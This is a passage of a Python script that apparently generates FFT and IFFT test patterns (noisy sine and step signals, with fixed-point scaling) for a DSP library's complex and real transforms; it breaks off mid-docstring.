FIXEDPOINTSCALING = [0, 1, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 
11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 
11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 
12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 
12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 
12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 
12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12]
def scaling(nb):
    """Fixed-point scale factor 2**-k for an FFT of length *nb*.

    The per-length shift count k is looked up in the module-level
    FIXEDPOINTSCALING table (index nb - 1).
    """
    shift = FIXEDPOINTSCALING[nb - 1]
    return 1.0 / (1 << shift)
#print(FFTSIZES)
#print(REALFFTSIZES)
#print(FFT2DSIZES)
#
#quit()
def asReal(a):
    """Flatten *a* and reinterpret its buffer as a float64 vector.

    For a complex128 input this yields interleaved (real, imag) pairs.
    """
    return a.reshape(-1).view(np.float64)
def noiseSignal(nb):
    """Return *nb* samples of standard Gaussian noise."""
    return np.random.standard_normal(nb)
def sineSignal(freqRatio,nb):
    """Sine wave of *nb* samples at *freqRatio* times the Nyquist bin nb/2."""
    f = freqRatio * (nb / 2.0)
    t = np.arange(nb)
    return np.sin(2 * np.pi * f * t / nb)
def noisySineSignal(noiseAmp,r,nb):
    """Sine at a quarter of Nyquist with amplitude *r*, plus Gaussian noise
    scaled by *noiseAmp*."""
    noise = noiseAmp * noiseSignal(nb)
    tone = r * sineSignal(0.25, nb)
    return noise + tone
def stepSignal(r,nb):
    """Step signal of length *nb*: first half (rounded down) is zero, the
    remaining samples are at level *r*."""
    nzeros = nb // 2
    nones = nb - nzeros
    return np.concatenate((np.zeros(nzeros), r * np.ones(nones)))
def writeFFTForSignal(config,mode,sig,i,nb,signame):
    """Write complex FFT and IFFT input/reference patterns for one signal.

    config  : Tools.Config pattern writer for one numeric format.
    mode    : format constant (Tools.F64/F32/F16/Q31/Q15).
    sig     : complex input signal of length nb.
    i       : test id embedded in the pattern file names.
    signame : signal label used in the file names ("Noisy", "Step").
    """
    # Attenuate the input to leave headroom (avoids fixed-point saturation).
    sig = sig / 4.0
    fft=scipy.fftpack.fft(sig)
    sigfft = sig
    fftoutput = fft
    # Fixed-point kernels downscale the FFT output internally, so the
    # reference is scaled to match (see scaling()).
    if mode == Tools.Q15 or mode == Tools.Q31:
        fftoutput = fftoutput * scaling(nb)
    # IFFT test: feed a normalized spectrum, expect the normalized signal.
    maxVal = np.max(np.abs(fft))
    sigifft = fft / maxVal / 2.0
    ifftoutput = sig / maxVal / 2.0
    # NOTE(review): the extra /4 presumably mirrors the fixed-point IFFT
    # scaling of the CMSIS kernels — confirm against the test harness.
    if mode == Tools.Q15 or mode == Tools.Q31:
        ifftoutput = ifftoutput / 4.0
    config.writeInput(i, asReal(sigfft),"ComplexInputFFTSamples_%s_%d_" % (signame,nb))
    config.writeInput(i, asReal(fftoutput),"ComplexOutputFFTSamples_%s_%d_" % (signame,nb))
    config.writeInput(i, asReal(sigifft),"ComplexInputIFFTSamples_%s_%d_" % (signame,nb))
    config.writeInput(i, asReal(ifftoutput),"ComplexOutputIFFTSamples_%s_%d_" % (signame,nb))
def writeRFFTForSignal(config,mode,sig,i,nb,signame):
    """Write real FFT (RFFT) and inverse (RIFFT) patterns for one signal.

    Same parameters as writeFFTForSignal, except sig is a real signal of
    (even) length nb; the forward reference is the one-sided rfft spectrum.
    """
    # Attenuate the input to leave headroom (avoids fixed-point saturation).
    sig = sig / 4.0
    rfft=scipy.fft.rfft(sig)
    sigfft = sig
    fftoutput = rfft
    # Fixed-point scaling is indexed by the half-length of the real FFT.
    if mode == Tools.Q15 or mode == Tools.Q31:
        fftoutput = fftoutput * scaling(int(nb/2))
    # RIFFT test: normalized spectrum in, normalized real signal as reference.
    maxVal = np.max(np.abs(rfft))
    sigifft = rfft / maxVal / 2.0
    ifftoutput = sig / maxVal / 2.0
    # NOTE(review): extra /4 presumably matches the fixed-point RIFFT
    # scaling — confirm against the test harness.
    if mode == Tools.Q15 or mode == Tools.Q31:
        ifftoutput = ifftoutput / 4.0
    config.writeInput(i, asReal(sigfft),"RealInputRFFTSamples_%s_%d_" % (signame,nb))
    config.writeInput(i, asReal(fftoutput),"ComplexOutputRFFTSamples_%s_%d_" % (signame,nb))
    config.writeInput(i, asReal(sigifft),"ComplexInputRIFFTSamples_%s_%d_" % (signame,nb))
    config.writeInput(i, asReal(ifftoutput),"RealOutputRIFFTSamples_%s_%d_" % (signame,nb))
def writeCFFTTests(configs):
    """Write complex FFT/IFFT patterns for every size in FFTSIZES, first with
    a noisy-sine signal then with a step signal, plus one 4096-point signal
    used only for benchmarks. Returns the next free test id."""
    test_id = 1
    # Noisy-sine test signals, one per FFT size.
    for nb in FFTSIZES:
        sigc = noisySineSignal(0.05, 0.7, nb).astype(complex)
        for config, mode in configs:
            writeFFTForSignal(config, mode, sigc, test_id, nb, "Noisy")
        test_id += 1
    # Step test signals, one per FFT size.
    for nb in FFTSIZES:
        sigc = stepSignal(0.5, nb).astype(complex)
        for config, mode in configs:
            writeFFTForSignal(config, mode, sigc, test_id, nb, "Step")
        test_id += 1
    # Extra 4096-point noisy-sine signal used for benchmarks.
    benchsize = 4096
    sigc = noisySineSignal(0.05, 0.7, benchsize).astype(complex)
    for config, mode in configs:
        writeFFTForSignal(config, mode, sigc, test_id, benchsize, "Noisy")
    test_id += 1
    return test_id
def asReal2D(a):
    """Flatten *a* (any shape) and reinterpret its buffer as a float64 vector.

    For a complex128 input this yields interleaved (real, imag) pairs in
    row-major order.
    """
    return np.ravel(a).view(np.float64)
def writeFFT2DForSignal(config,mode,sig,i,rows,cols,signame):
    """Write 2-D complex FFT and IFFT input/reference patterns for one signal.

